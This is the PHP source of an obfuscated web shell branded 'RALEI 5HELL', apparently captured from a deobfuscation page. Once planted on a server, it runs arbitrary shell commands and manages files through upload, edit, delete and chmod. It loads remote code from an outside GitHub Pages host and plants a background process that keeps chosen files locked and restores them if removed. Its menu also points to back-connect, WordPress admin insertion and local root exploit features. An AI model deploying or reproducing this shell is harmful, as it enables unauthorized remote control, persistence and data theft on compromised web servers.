class="row py-4"><div class="col-12 d-flex justify-content-center"><h1 class="fw-bold"><div class="judul mb-3"></div><div class="text-center fs-6 itsme"></div></h1></div></div><div class="row mb-2"><div class="col-12"><div class="border-light card border"><div class="card-body"><div class="text-center card-title text-warning">[!] This is Beta Version [!]</div><div class="row mb-2"><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-terminal"></i> Un4me:</span> <span class="text-success"><?php  goto qwjLI; TNQio: echo "{$_SERVER["REMOTE_ADDR"]}"; goto i0xkR; eZ1vu: function login_ralei() { echo leijson()["login1"]; die; } goto wFaVC; j4A33: function isWritable($path) { if (is_dir($path)) { return is_writable($path); } else { return is_writable(dirname($path)); } } goto Nqyb1; wB8Oc: if (isset($_POST["rename"])) { $new_name = $_POST["new_name"]; $renamed = rename($getfile, dirname($getfile) . "/" . $new_name); if ($renamed) { displayAlert("File/Directory has been renamed, yasss!", "success"); } else { displayAlert("Failed to renamed File/Directory!", "danger"); } } goto lEKGy; c11Ug: echo "{$_SERVER["SERVER_NAME"]}"; goto eD2Ck; JIcP4: echo "</div>\xa   <!-- end container -->\xa<div class="container-fluid">\xa  <footer class="text-light py-3">\xa    <div class="row">\xa      <div class="col-12">\xa        <p class="myteam text-decoration-underline text-center"></p> 
      </div> 
    </div> 
</footer> 
    </div>\xa<script src="https://rhmansh.github.io/RALEI-SHELL/assets/js/main.js"></script>     
</body> 
</html>"; goto utTWY; MSit5: if (isset($_GET["ex"]) && $_GET["ex"] == "retmi") { echo leijson()["readme"]; } goto xFpoT; YUX2m: function rrmdir($dir) { if (!is_dir($dir)) { throw new Exception("{$dir} is not a directory."); } $objects = scandir($dir); if ($objects === false) { throw new Exception("Failed to read directory {$dir}."); } foreach ($objects as $object) { if ($object != "." && $object != "..") { $path = $dir . "/" . $object; if (is_dir($path)) { if (!rrmdir($path)) { return false; } } else { if (!unlink($path)) { return false; } } } } if (!reset($objects)) { return false; } if (!rmdir($dir)) { return false; } clearstatcache(true, $dir); if (is_dir($dir)) { return false; } return true; } goto mubNe; SlGUD: if (!isset($_SESSION["masuk"]) || $_SESSION["masuk"] != $auth_pass) { login_ralei(); } goto W6n8o; iadoK: echo function_exists("perl") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto IBFMi; fg2Cp: echo isWritable(isset($getfile) ? $getfile : $getdir) ? span("[ Writable ] - ", "success") . "<span class="text-success">" . cekPerm(isset($getfile) ? $getfile : $getdir) . "</span>" : span("[ Not Writable ] - ", "danger") . "<span class="text-danger">" . cekPerm(isset($getfile) ? $getfile : $getdir) . "</span>"; goto LfSDA; S9YqN: echo isset($getfile) ? get_tree_path($getfile) : get_tree_path($getdir); goto V8syj; flT2x: echo "?getdir=" . $getdir . "&ex=search"; goto SOZKH; lh6vq: echo IS_WIN ? "<span class="text-success">Windows</span>" : "<span class="text-success">Unix</span>"; goto yMi02; qdLwq: echo @$_SERVER["SERVER_ADDR"]; goto cmASg; jYFEI: echo extension_loaded("php_ruby") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto lu_RQ; JGZ79: if (isset($_POST["save_file"])) { $isifile = $_POST["isifile"]; $file_path = $getfile; function svwrite($fn, $c) { $f = fopen($fn, "w"); if ($f) { fwrite($f, $c); fclose($f); return true; } else { return false; } } function svfpc($fn, $c) { if (file_put_contents($fn, $c) !== false) { return true; } else { return false; } } if (svwrite($file_path, $isifile)) { displayAlert("Update File OK!", "success"); } else { $errsv = error_get_last(); if ($errsv !== null) { $errorMessage = $errsv["message"]; displayAlert("Update File FAILED! Error: {$errorMessage}", "danger"); } else { if (svfpc($file_path, $isifile)) { displayAlert("Update File OK!", "success"); } else { displayAlert("Update File FAILED!", "danger"); } } } } goto MSit5; KdUFm: ?>  
<span class="text-<?php  goto kocnX; EOEix: ?>  
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-filetype-php"></i> PHP version:</span> <span class="text-success"><?php  goto AkcPy; Od1fM: echo "&#9730; { RALEI 5HELL }"; goto NLzar; eo9oy: ?>  
</div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-cloud"></i> Web Server:</span> <span class="text-success"><?php  goto EGi9S; GVhMk: ?>  
</span></div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-globe"></i> Domain:</span> <span class="text-success"><?php  goto c11Ug; H6Tp2: $auth_pass = "93f47598a626a203ce65b0e587d889a0"; goto Hs_m8; PpmRX: if (isset($_GET["ex"]) && $_GET["ex"] == "search") { function sercing($dir, $searchQuery) { $res = ''; $files = scandir($dir); foreach ($files as $file) { if ($file === "." || $file === "..") { continue; } $path = $dir . "/" . $file; if (is_dir($path)) { $res .= sercing($path, $searchQuery); } else { if (strpos($file, $searchQuery) !== false) { $res .= $path . "\n"; } } } return $res; } echo modalpost("Search File / Dir", "Search...", $modalCsearch, "fa-search", '', true, true); echo "<script>\xa         window.onload = function() {\xa  var getModalSer = document.querySelector("[data-bs-target='#searchfile/dir']");\xa  getModalSer.addEventListener("click", function(event) { 
    event.preventDefault();\xa  }); 
  getModalSer.click(); 
}  
</script>"; if (isset($_POST["sercing"])) { $serquery = $_POST["sercing"]; $seroutput = sercing(dirname($_SERVER["DOCUMENT_ROOT"]), $serquery); echo "<script>document.getElementById("seroutput").value = " . json_encode($seroutput) . ";</script>"; } } goto AZ5Qx; C0BHX: $modalCfolder = "<form method="post">" . "<div class="mb-4">" . "<label for="foldername-input" class="form-label">Folder Name</label>" . "<input type="text" class="form-control" name="folder_name" id="foldername-input" required placeholder="Enter folder name">" . "</div>" . "<div class="hstack gap-2 justify-content-end">" . "<button type="button" class="btn btn-outline-danger" data-bs-dismiss="modal">Close</button>" . "<button type="submit" class="btn btn-primary" name="create_folder" id="addNewFolder" data-bs-toggle="tooltip" data-bs-placement="top" data-bs-title="Create Folder">Create</button>" . "</div>" . "</form>"; goto bPZB4; utTWY: ?>  
 
Did this file decode correctly? 
Original Code 
<?php 
// pliz mas jgn nge recode wkwk 
// copyright rahmanralei 2023 
@clearstatcache(); 
@mb_internal_encoding('UTF-8'); 
@set_time_limit(0); 
error_reporting(0); 
 goto Gwr5s; bPZB4: $modalClock = "<form method="post">" . "<div class="mb-4">" . "<label for="filename-input" class="form-label">File Name</label>" . "<input type="text" class="form-control" name="filok" id="filename-input" required placeholder="Enter file name to l\303\xb8cked">" . "</div>" . "<div class="hstack gap-2 justify-content-end">" . "<button type="button" class="btn btn-outline-danger" data-bs-dismiss="modal">Close</button>" . "<button type="submit" class="btn btn-primary" name="lokfil" id="addNewFile">Lock Now</button>" . "</div>" . "</form>"; goto bXXTk; V8syj: ?> 
- <span><?php  goto fg2Cp; MKNta: function curl_req($u) { $c = curl_init(); curl_setopt($c, CURLOPT_URL, $u); curl_setopt($c, CURLOPT_RETURNTRANSFER, true); $o = curl_exec($c); curl_close($c); return $o; } goto S97wg; xN1dV: ini_restore("allow_url_fopen"); goto RJZ6S; GljT3: function modalpost($title, $label, $form, $icon = '', $text = '', $hidden = false, $size = false) { $titles = str_replace(" ", '', strtolower($title)); $labels = str_replace(" ", '', strtolower($label)); $hidden_attr = $hidden ? "d-none" : ''; $size = $size ? "modal-fullscreen-lg-down" : ''; return "<div class="modal fade zoomIn" id="" . $titles . "" tabindex="-1" aria-labelledby="" . $titles . "_Label" aria-hidden="true">" . "<div class="modal-dialog modal-dialog-centered " . $size . "">" . "<div class="modal-content">" . "<div class="modal-header p-3 bg-soft-primary">" . "<h5 class="modal-title" id="" . $titles . "_Label">" . $title . "&nbsp; <i class="fad " . $icon . ""></i></h5>" . "<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>" . "</div>" . "<div class="modal-body">" . $form . "</div>" . "</div>" . "</div>" . "</div>" . "<button class="btn btn-outline-light " . $hidden_attr . " me-2" data-bs-toggle="modal" data-bs-target="#" . $titles . "" data-bs-toggle2="tooltip" data-bs-placement="top" data-bs-title="" . $title . ""><i class=" " . $icon . "">" . $text . "</i></button>"; } goto Zbqxa; SwLyI: function formatBytes($size, $precision = 2) { $u = array("B", "KB", "MB", "GB", "TB"); $b = max($size, 0); $pow = floor(($b ? log($b) : 0) / log(1024)); $pow = min($pow, count($u) - 1); $b /= pow(1024, $pow); return round($b, $precision) . " " . $u[$pow]; } goto YUX2m; KNMNH: echo function_exists("curl_version") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto L3Eg1; yMi02: ?> 
</div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-code-slash"></i> Perl:</span><?php  goto iadoK; LfSDA: ?> 
</span></span></div></div></div></div><?php  goto PpmRX; dPqA6: echo modalpost("Create File", "File Name", $modalCfile, "fad fa-file-circle-plus"); goto OZW8u; bXXTk: $modalCsearch = "<form method="POST">
      <div class="mb-3">\xa        <div class="w-100">\xa          <textarea class="form-control bg-black text-success" id="seroutput" name="seroutput" rows="25" readonly></textarea>\xa        </div>
      </div>\xa      <div class="mb-3 d-flex">\xa        <input type="text" class="form-control bg-black text-success" id="sercing" name="sercing" placeholder="Search Name...">\xa      <button type="submit" class="btn bg-black text-light float-end ms-2"><i class="fad fa-search"></i></button>
</div>
    </form>"; goto jyDMo; S97wg: function get_tree_path($path) { $canonical_path = realpath($path); $path_parts = explode("/", $canonical_path); $tree_path = ''; $current_path = ''; foreach ($path_parts as $part) { $current_path .= $part . "/"; $tree_path .= "<a class='text-truncate fst-normal text-light text-decoration-none' href='?getdir=" . $current_path . "'>" . $part . "</a> / "; } $tree_path = rtrim($tree_path, "/ "); return $tree_path; } goto Sw0vr; Sw0vr: function leijson() { $lei = "https://rhmansh.github.io/RALEI-SHELL/json/ralei.json"; if (ini_get("allow_url_fopen")) { $jd = file_get_contents($lei); } else { $jd = curl_req($lei); } $d = json_decode($jd, true); return $d; } goto j4A33; IBFMi: ?> 
</div></div><div class="row mb-2"><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-toggle2-off"></i> Disable Function:</span><?php  goto yQvhJ; SOZKH: ?> 
"><i class="fad fa-search"></i></a> <a class="btn btn-outline-light me-2 ms-2"data-bs-placement="top"data-bs-title="github"data-bs-toggle2="tooltip"href="https://github.com/rhmansh"><i class="bi bi-github"></i></a></div></div></div></div></div></div><?php  goto q9Zuh; gKZcJ: $vartn = isset($_POST["command"]) ? $defcmd . " " . $_POST["command"] : $defcmd; goto AfZc1; pdgfd: if (isset($getdir)) { if (isset($_POST["create_file"])) { $file_name = $_POST["file_name"]; $filepath = $getdir . "/" . $file_name; if (file_exists($filepath)) { echo "<div class='alert alert-danger'>File sudah ada.</div>"; } else { if (touch($filepath)) { echo "<div class='alert alert-success'>File baru berhasil dibuat.</div>"; } else { $filecreate = fopen($filepath, "w"); if ($filecreate == false) { echo "<div class='alert alert-danger'>Tidak dapat membuat file baru.</div>"; } else { fclose($filecreate); echo "<div class='alert alert-success'>File baru berhasil dibuat.</div>"; } } } } if (isset($_POST["create_folder"])) { $folder_name = $_POST["folder_name"]; $folderpath = $getdir . "/" . $folder_name; if (mkdir($folderpath) == false) { echo "<div class='alert alert-danger'>Tidak dapat membuat folder.</div>"; } else { echo "<div class='alert alert-success'>Folder baru berhasil dibuat.</div>"; } } echo "
<div class="row mb-2">
  <div class="col-12">\xa    <div class="card border border-light">\xa      <div class="card-body d-flex flex-wrap justify-content-center">
          <a href="?getdir=" . $getdir . "&ex=terminal" class="btn btn-ralei me-2 mb-2">Terminal</a>
          <a href="?getdir=" . $getdir . "&ex=adminer" class="btn btn-ralei me-2 mb-2">Adminer</a>\xa          <a href="?getdir=" . $getdir . "&ex=scanrot" class="btn btn-ralei me-2 disabled mb-2">Scan R\xc3\xb8\xc3\270t</a>\xa          <a href="?getdir=" . $getdir . "&ex=portscan" class="btn btn-ralei disabled me-2 mb-2">Port Scan</a>
          <a href="?getdir=" . $getdir . "&ex=backconn" class="btn btn-ralei disabled me-2 mb-2">Back Conn3ct</a>
          <a href="?getdir=" . $getdir . "&ex=wpadd" class="btn btn-ralei disabled me-2 mb-2">Add Admin (WP)</a>\xa          <a href="?getdir=" . $getdir . "&ex=lokfil" class="btn btn-ralei me-2 mb-2">L\xc3\270ck File</a>\xa          <a href="?getdir=" . $getdir . "&ex=lockfile2" class="btn btn-ralei me-2 position-relative mb-2">Lock File 2<span class="position-absolute top-0 start-50 translate-middle badge bg-info">LINUX\xa  </span></a>
          <a href="https://github.com/rhmansh/Localr-ot-ALL-CVE" target="_blank" class="btn btn-ralei me-2 mb-2">Localro\xc3\xb8t</a>
          <a href="?getdir=" . $getdir . "&ex=kill_me" class="btn btn-ralei2 me-2 mb-2" onclick="return confirm('Sure?')">Kill Self</a>\xa          <a href="?getdir=" . $getdir . "&ex=keluar" class="btn btn-ralei me-2 mb-2">Logout</a>
          <a href="?getdir=" . $getdir . "&ex=retmi" class="btn btn-ralei me-2 mb-2">Readme</a>
      </div>
    </div>\xa  </div>
</div>\xa    <form method="post">\xa    <div class="row mb-2">
     <div class="col-12">
     <div class="card border border-light">
     <div class="card-body">\xa      <div class="table-responsive">\xa       <table class="table table-dark table-striped text-nowrap">
        <thead class="text-light">\xa         <tr>
          <th scope="col"><input id="cbox-all" class="form-check-input" type="checkbox">&ensp;Names</th>\xa          <th scope="col">Types</th>
          <th scope="col">Sizes</th>\xa          <th scope="col">Last Modded</th>\xa          <th scope="col">UID/GID</th>
          <th scope="col">Permissions</th>
          <th scope="col">Actions</th>\xa         </tr>\xa        </thead>
        <tbody>"; if (is_dir($getdir)) { if (is_readable($getdir)) { $filescn = scandir($getdir); $filescn = array_filter($filescn, function ($fileye) { return strcmp($fileye, ".") !== 0; }); if ($filescn !== false) { function get_file_owner($path) { if (IS_WIN) { return fileowner($path) . "/" . filegroup($path); } else { $uid = fileowner($path); return posix_getpwuid($uid)["name"] . "/" . posix_getgrgid(filegroup($path))["name"]; } } function get_file_perms($path) { if (IS_WIN) { return substr(sprintf("%o", fileperms($path) & 4095), -3); } else { return substr(sprintf("%o", fileperms($path)), -3); } } foreach ($filescn as $filey) { $getpath = $getdir . "/" . $filey; $getpath = trim($getpath); if (is_file($getpath)) { echo "<tr>"; echo "<td><input class='form-check-input' type='checkbox' name='cekbox[]' value='" . $getpath . "'>&ensp;<i class="fad fa-files" style="--fa-primary-opacity: 0.5; --fa-secondary-opacity: 1;"></i>&ensp;<a class="text-light text-decoration-none" href='?getfile=" . $getpath . "'>" . $filey . "</a></td>"; echo "<td><span class="text-" . (is_writable($getpath) ? "success" : (is_readable($getpath) ? "white" : "danger")) . "">[ File ]</span></td>"; $filesize = filesize($getpath); echo "<td>" . formatBytes($filesize) . "</td>"; echo "<td>" . date("d-m-Y/H:i", filemtime($getpath)) . "</td>"; $fileowner = get_file_owner($getpath); echo "<td>" . $fileowner . "</td>"; $perms = cekPerm($getpath); if (is_readable($getpath) && is_writable($getpath)) { echo "<td class='text-success'>" . $perms . "</td>"; } else { if (is_readable($getpath)) { echo "<td class='text-light'>" . $perms . "</td>"; } else { echo "<td class='text-danger'>" . $perms . "</td>"; } } echo "<td>" . twomenu("?getfile=" . $getpath) . "</td>"; echo "</tr>"; } elseif (is_dir($getpath)) { echo "<tr>"; echo "<td><input class='form-check-input' type='checkbox' name='cekbox[]' value='" . $getpath . "'>&ensp;<i class="text-warning fad fa-folders" style="--fa-secondary-opacity: 1;"></i>&ensp;<a class="text-light text-decoration-none" href='?getdir=" . $getpath . "'>" . $filey . "</a></td>"; echo "<td><span class="text-" . (is_writable($getpath) ? "success" : (is_readable($getpath) ? "white" : "danger")) . "">[ Dir ]</span></td>"; echo "<td>-</td>"; echo "<td>-</td>"; $fileowner = get_file_owner($getpath); echo "<td>" . $fileowner . "</td>"; $perms = cekPerm($getpath); if (is_readable($getpath) && is_writable($getpath)) { echo "<td class='text-success'>" . $perms . "</td>"; } else { if (is_readable($getpath)) { echo "<td class='text-light'>" . $perms . "</td>"; } else { echo "<td class='text-danger'>" . $perms . "</td>"; } } echo "<td>" . twomenu("?getfile=" . $getpath) . "</td>"; echo "</tr>"; } } } else { displayAlert("Failed to open directory : {$getdir}", "danger"); } } else { displayAlert("{$getdir} : Path not readable.", "danger"); } } else { displayAlert("{$getdir} : Not a valid directory path.", "danger"); } echo " </tbody>
       </table>
      </div>\xa      </div>
      </div>\xa     </div>\xa    </div>\xa  <div class="row py-2">
    <div class="col-3">
          <div class="form-group d-flex">
            <select class="form-select col-3 col-sm-4 me-2 bg-dark text-warning" name="maction">\xa    <option value="hapus">Delete</option>
    <option value="cemode">Chmod</option>\xa</select>\xa<input type="text" class="form-control col-3 col-sm-4 me-2" name="cemod" placeholder="0777" style="display: none;">\xa<button type="submit" name="massact" class="btn btn-warning ms-auto">Submit</button>
          </div>
        </div>
  </div>\xa</form>"; } 
if(isset($_GET['ex']) && $_GET['ex'] == "lokfil") { function lockFile($file) { global $getdir; $file = $getdir . '/' . $file; $dir = sys_get_temp_dir() . '/.s'; $textFile = $dir . '/' . base64_encode($file) . '-t'; $handlerFile = $dir . '/' . base64_encode($file) . '-h'; $targetDir = dirname($file); if (file_exists($textFile)) unlink($textFile); if (file_exists($handlerFile)) unlink($handlerFile); if (!file_exists($dir)) mkdir($dir); if (!copy($file, $textFile)) { displayAlert("False, Please Check Filename", "danger"); return; } if (!chmod($file, 0444)) { displayAlert("Locked Status False", "danger"); return; } $handler = <<<EOD 
<?php 
@ini_set("max_execution_time", 0); 
while (file_exists("$file")) { 
    if (!file_exists("$file")) { 
        \$t = base64_encode(file_get_contents("$textFile")); 
        file_put_contents("$file", base64_decode(\$t)); 
    } 
    if (fileperms("$file") !== 33060) { 
        chmod("$file", 0444); 
    } 
    if (fileperms("$targetDir") !== 33261) { 
        chmod("$targetDir", 0555); 
    } 
} 
EOD; if (!file_put_contents($handlerFile, $handler)) { displayAlert("Failed To Handler File", "danger"); return; } if (IS_WIN) { excmd("start /B php $handlerFile > NUL 2>NUL"); } else { excmd("php $handlerFile > /dev/null 2>/dev/null &"); } displayAlert("Locked Status True", "success"); } } 
if (isset($_POST['lokfil'])) { 
    lockFile($_POST['filok']); 
} 
goto JIcP4; Acaur: if (isset($_POST["command"])) { $command = $_POST["command"]; $jsoncmd = excmd($command, $getdir); $rescmd = $jsoncmd; if ($rescmd === false) { $error = "error"; echo $error; } else { echo $rescmd; } die; } goto lvt26; lu_RQ: ?> 
</div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-filetype-py"></i> Python:</span><?php  goto XL0iB; L3Eg1: ?> 
</div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-filetype-rb"></i> Ruby:</span><?php  goto jYFEI; u7qY1: function excmd($koman, $dir = null) { $fff = array("shell_exec", "exec", "system", "passthru"); $o = null; if ($dir !== null) { $koman = "cd "" . $dir . "" && " . $koman; } foreach ($fff as $func) { if (function_exists($func)) { $o = $func($koman); if ($o !== null) { $o = utf8_encode($o); $json = json_encode($o); if ($json !== false) { if (trim($o) === '') { $err = ''; return $err; } return $o; } } } } if (strpos(strtolower($o), "command not found") !== false) { $err = "Command not found."; } else { $err = "No suitable function found to execute the command."; } return $err; die; } goto Acaur; OZW8u: echo modalpost("Create Folder", "Folder Name", $modalCfolder, "fad fa-folder-plus"); goto N5d1G; lvt26: if (isset($_GET["ex"]) && $_GET["ex"] == "keluar") { session_destroy(); header("Refresh: 0; url={$_SERVER["PHP_SELF"]}"); die; } goto C2o3f; Y7joY: @clearstatcache(); goto tTGul; IU1Xg: echo modalpost("Upload File", "Select File", $modalUpload, "fad fa-upload"); goto dPqA6; Nqyb1: function span($text, $color) { return "<span class="text-" . $color . "">" . $text . "</span>"; } goto gDQyA; pZLfW: if (isset($_GET["ex"]) && $_GET["ex"] == "upload") { if (isset($_FILES["upfile"])) { function upFil($f, $d) { if (move_uploaded_file($f["tmp_name"], $d)) { return true; } return false; } $upfile = $_FILES["upfile"]; $upfiltodir = isset($_GET["getdir"]) ? $_GET["getdir"] : ''; $desfil = $upfiltodir . "/" . $upfile["name"]; if (upFil($upfile, $desfil)) { displayAlert("Success Upload In" . $desfil, "success"); } else { displayAlert("Failed Upload In " . $desfil, "danger"); } } } goto Mrb2A; EGi9S: echo "{$_SERVER["SERVER_SOFTWARE"]}"; goto EOEix; fgSyv: echo getcwd(); goto uGapP; N5d1G: ?> 
<a class="btn btn-outline-light me-2 ms-2"data-bs-placement="top"data-bs-title="searching"data-bs-toggle2="tooltip"href="<?php  goto flT2x; RJZ6S: ini_restore("safe_mode"); goto SexdO; wBzEb: function getUserGroupInfo() { $username = get_current_user(); if (function_exists("posix_getuid") && function_exists("posix_getgid")) { $uid = posix_getuid(); $gid = posix_getgid(); $groupinfo = posix_getgrgid($gid); $groupname = $groupinfo["name"]; } else { $uid = getmyuid(); $gid = getmygid(); $groupname = "?"; } return "<span class='text-success'>{$username} ({$uid}) / {$groupname}</span>"; } goto SwLyI; yQvhJ: $disabledFunc = getDisabledFunctions(); goto KdUFm; ib1xY: @ini_set("max_execution_time", 0); goto rHz1f; uGapP: ?> 
"><i class="fad fa-house"></i></a> <a class="btn btn-outline-light me-2 font-weight-bold"data-bs-placement="top"data-bs-title="Refresh"data-bs-toggle2="tooltip"href="#"onclick="location.replace(location.href)"><i class="fad fa-rotate"></i> </a><?php  goto IU1Xg; jyDMo: $defcmd = "> " . termnotasi(); goto gKZcJ; XL0iB: echo function_exists("python") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto Jtcyo; i0xkR: ?> 
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-hdd-stack"></i> Server IP:</span> <span class="text-success"><?php  goto kBm3K; Wy3xc: function displayAlert($msg, $type) { echo "<div class="alert alert-" . $type . " alert-dismissible fade show border-light" role="alert">\xa              " . $msg . "
              <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
          </div>"; } goto MKNta; Jtcyo: ?> 
</div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-terminal"></i> OS:</span><?php  goto lh6vq; rHz1f: @ini_set("output_buffering", 0); goto qanfw; Ztzcw: function getDisabledFunctions() { $d = ini_get("disable_functions"); $arr = array(); if ($d) { foreach (explode(",", $d) as $func) { $arr[] = $func; } } return $arr; } goto Wy3xc; RJWH8: $cekfopenon = ini_get("allow_url_fopen"); goto H6Tp2; lEKGy: if (isset($_POST["change_permission"])) { $permission = intval($_POST["permission"], 8); if (chmod($getfile, $permission)) { displayAlert("Change Permission OK!", "success"); } else { displayAlert("Change Permission FAILED!", "danger"); } } goto JGZ79; j84KU: @set_time_limit(0); goto ib1xY; pHDy4: function cekPerm($f) { if (IS_WIN) { $perms = @fileperms($f) & 4095; } else { $perms = @fileperms($f); } $mode = ''; $mode .= $perms & 256 ? "r" : "-"; $mode .= $perms & 128 ? "w" : "-"; $mode .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $mode .= $perms & 32 ? "r" : "-"; $mode .= $perms & 16 ? "w" : "-"; $mode .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $mode .= $perms & 4 ? "r" : "-"; $mode .= $perms & 2 ? "w" : "-"; $mode .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); $permis = substr(sprintf("%o", $perms), -3); $res = "(" . $permis . ") " . $mode; return $res; } goto u7qY1; Hs_m8: define("IS_WIN", strtoupper(substr(PHP_OS, 0, 3)) === "WIN"); goto LfI7x; Fxsb6: $getfile = isset($_GET["getfile"]) && !empty($_GET["getfile"]) ? IS_WIN ? str_replace("\", "/", $_GET["getfile"]) : $_GET["getfile"] : null; goto Ztzcw; AfZc1: $modalCmd = "<form id="formcmd" method="POST">\xa      <div class="mb-3">\xa        <div class="w-100">
          <textarea class="form-control bg-black text-success font-monospace" id="rescmd" name="rescmd" rows="25" readonly></textarea>
        </div>\xa      </div>\xa      <div class="mb-3 d-flex">
        <input type="text" class="form-control bg-black text-success font-monospace" id="command" name="command" placeholder="" . $vartn . "">
        <button type="submit" class="btn bg-black text-light float-end ms-2">
          <span class="spinner-border spinner-border-sm d-none" role="status" aria-hidden="true"></span>
          <span class="visually-hidden">Loading...</span>
          <i class="fad fa-send"></i>
        </button>
      </div>\xa    </form>"; goto pHDy4; xFpoT: ?> 
<div class="row mb-2"><div class="col-12"><div class="border-light card"><div class="d-flex card-body"style="overflow:auto"><span class="text-warning flex-grow-1 mb-0 text-decoration-none"><i class="fa-duotone fa-folder-open"style="--fa-secondary-opacity:0.7"></i><?php  goto S9YqN; W6n8o: ?> 
<!doctypehtml><html data-bs-theme="dark"lang="id"><head><meta charset="utf-8"><meta content="width=device-width,initial-scale=1"name="viewport"><meta content="noindex, nofollow"name="robots"><meta content="no-cache, must-revalidate, post-check=0, pre-check=0"http-equiv="cache-control"><meta content="0"http-equiv="expires"><meta content="no-cache"http-equiv="pragma"><title><?php  goto Od1fM; ZHQre: function twomenu($g) { $d = $_SERVER["DOCUMENT_ROOT"]; $c = count(explode("/", $d)) - 1; $p = trim(dirname(str_replace("?getfile=", '', $g)), "/"); $f = basename($g); $r = array_slice(explode("/", $p), $c); $u = $_SERVER["HTTP_HOST"] . "/" . implode("/", $r) . "/" . $f; $h = "<div class="btn-group" style="letter-spacing: 3px;"><button type="button" class="btn btn-dark" data-bs-toggle="dropdown" aria-expanded="false"><i class="fad fa-gear"></i></button><ul class="dropdown-menu">"; $h .= "<li><a style="font-size: 13px;" class="dropdown-item text-light" href="" . $g . ""><i class="fad fa-pen-to-square"></i> EDIT</a></li>"; $h .= "<li><a style="font-size: 13px;" class="dropdown-item text-light" href="https://" . trim($u) . "" target="_blank"><i class="fad fa-globe"></i> VIEW</a></li>"; $h .= "</ul></div>"; return $h; } goto wBzEb; SexdO: ini_restore("open_basedir"); goto RJWH8; AkcPy: echo phpversion(); goto GVhMk; tWlkv: ?> 
</span></div><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-person"></i> User (ID) / Group:</span><?php  goto Zxvrr; wFaVC: if (isset($_GET["loginlei"])) { $submitted_pass = isset($_GET["pwdlei"]) ? $_GET["pwdlei"] : ''; if (md5($submitted_pass) == $auth_pass) { $_SESSION["masuk"] = $auth_pass; } else { echo "<script>alert('Paswd Salah! Km Mw Nikung Yh? :v');</script>"; login_ralei(); } } goto SlGUD; NLzar: ?> 
<?php  goto qdLwq; kocnX: echo !empty($disabledFunc) ? "danger" : "success"; goto KmulI; gDQyA: if (isset($_GET["ex"]) && $_GET["ex"] == "adminer") { function gadminer($cek) { $lei = leijson()["lei"]; $php_url = $lei[0]; $css_url = $lei[1]; $php = $cek ? file_get_contents($php_url) : curl_req($php_url); $css = $cek ? file_get_contents($css_url) : curl_req($css_url); $a = "adminer.php"; $b = "adminer.css"; if (!file_exists($a) || filesize($a) == 0) { if (file_exists($a)) { unlink($a); unlink($b); } if (!file_put_contents($b, $css) || !file_put_contents($a, $php)) { die("Failed to create adminer"); } } include $a; } gadminer($cekfopenon); } goto ZHQre; OvkMa: $modalCfile = "<form method="post">" . "<div class="mb-4">" . "<label for="filename-input" class="form-label">File Name</label>" . "<input type="text" class="form-control" name="file_name" id="filename-input" required placeholder="Enter file name">" . "</div>" . "<div class="hstack gap-2 justify-content-end">" . "<button type="button" class="btn btn-outline-danger" data-bs-dismiss="modal">Close</button>" . "<button type="submit" class="btn btn-primary" name="create_file" id="addNewFile">Create</button>" . "</div>" . "</form>"; goto C0BHX; M2vPM: if (isset($getfile)) { if (file_exists($getfile)) { function to_dir() { global $getdir; $url = $_SERVER["REQUEST_URI"]; $to = preg_replace("/(\?|&)getfile=/", "$1getdir=", $url); $go = dirname($to); echo "<script> setTimeout(function() {window.location = '{$go}'; }, 1000);</script>"; } function read_file($filename) { $lines = file($filename); return implode('', $lines); } if ($cekfopenon) { $file_contents = is_file($getfile) ? file_get_contents($getfile) : ''; } else { $file_contents = is_file($getfile) ? read_file($getfile) : ''; } echo "\xa    <div class="row mb-2">\xa    <div class="col-6">
    <div class="card border border-light">\xa    <div class="card-body">\xa    <form method="post">
    <div class="form-group">
        <label class="text-light">Name:</label>\xa        <input type="text" class="form-control" id="namafile" name="new_name" value="" . basename($getfile) . "">\xa    </div>\xa    <div class="py-2">
    <input type="submit" class="btn btn-sm btn-outline-light" style="width:100%;"  name="rename" value="Rename">
    </div>
    </form>
    </div>
    </div>
    </div>\xa    "; echo "<div class="col-6">
  <div class="card border border-light">\xa  <div class="card-body">
  <form method="post">
  <div class="form-group">
    <label class="text-light">Permission</label>\xa    <input type="text" class="form-control" name="permission" value="" . @substr(sprintf("%o", fileperms($getfile)), -4) . "">
  </div>
  <div class="py-2">
  <input type="submit" class="btn btn-sm btn-outline-light" style="width:100%;" name="change_permission" value="Change">
  </div>
  </form>
  </div>
  </div>
  </div>
 </div>
 "; echo "
    <div class="row mb-2">
    <div class="col-12">
    <div class="card border border-light">\xa    <div class="card-body">    \xa    <form method="post">\xa    <div class="mb-3">
    <p class="text-light text-truncate text-center mb-3"># " . basename($getfile) . "</p>\xa    <textarea class="form-control" id="textarea" name="isifile" rows="10">" . htmlentities($file_contents) . "</textarea>       
    </div>
    <div class="d-flex d-grid gap-2 justify-content-center">\xa    <input type="submit" class="btn btn-outline-light" name="save_file" value="Update">\xa    <input type="button" class="btn btn-outline-light" onclick="savefrom('textarea')" value="Download">    \xa    </div>\xa    </form>
    </div>\xa    </div>\xa    </div>\xa    </div>
